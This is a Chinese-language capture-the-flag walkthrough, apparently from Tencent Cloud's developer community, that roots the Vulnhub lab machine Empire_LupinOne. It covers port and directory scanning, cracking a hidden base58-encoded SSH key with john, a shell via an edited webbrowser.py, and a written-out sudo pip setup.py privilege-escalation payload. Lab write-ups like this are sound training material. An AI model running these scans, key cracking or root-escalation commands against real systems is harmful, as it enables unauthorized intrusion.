Vulnhub靶机:Empire_LupinOne
原创
Vulnhub
简介
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,挑战的目标是获取操作系统的root权限和查看flag。
部署方法
下载地址:https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip
下载下来解压。这里我用的是Oracle VirtualBox。
一,信息收集
我是用kali的arp-scan,也可以用namp扫网段扫出来。这里可以用很多工具扫出来之举例一种。
arp-scan -I eth1 -l- -I 指定eth1这个网卡
- -l 扫描出全部主机
我们知道靶机的IP地址在192.168.30.61
nmap 192.168.30.61 -A -O -p-- -A 进行全面扫描,包括服务版本探测、操作系统检测等。
- -O 进行操作系统检测,尝试识别远程主机的操作系统类型。
- -p 指定要扫描的端口范围或特定端口,如1-65535或80,443。后使用namp扫描靶机。
开发22,80端口。
80端口就一张图而已,直接扫目录。
gobuster dir -u http://192.168.30.61/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x php,jsp,html,db,txt,xml
没什么特别的看一下robots.txt。说白了还得扫目录呗。
访问了一下,提示我们还有目录没扫出来
继续扫一下。
wfuzz --hh 275 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u "http://192.168.30.61/~FUZZ"
访问一下给了个用户,然后提示我是有ssh文件,还是得要扫。
ffuf -fs 278 -u "http://192.168.30.61/~secret/.FUZZ" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -c -ic -e .zip,.php,.html,.txt
拿到他说的密钥了,这很明显加密过了。这个加密是base58。
Base16 Base32 Base58 Base62 Base64 Base85 Base91 编码/解码 - 锤子在线工具
走个密钥爆破。这个字典上面也有提示
john --wordlist=/usr/share/wordlists/fasttrack.txt tmp1
拿到第一个用户。这个用户要跳到其他用户上。
修改一下webbrowser.py这个。让他给我弹一个shell。
这样就拿到arsene用户了。看一下他能干嘛。
直接提到root。找一下命令。
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
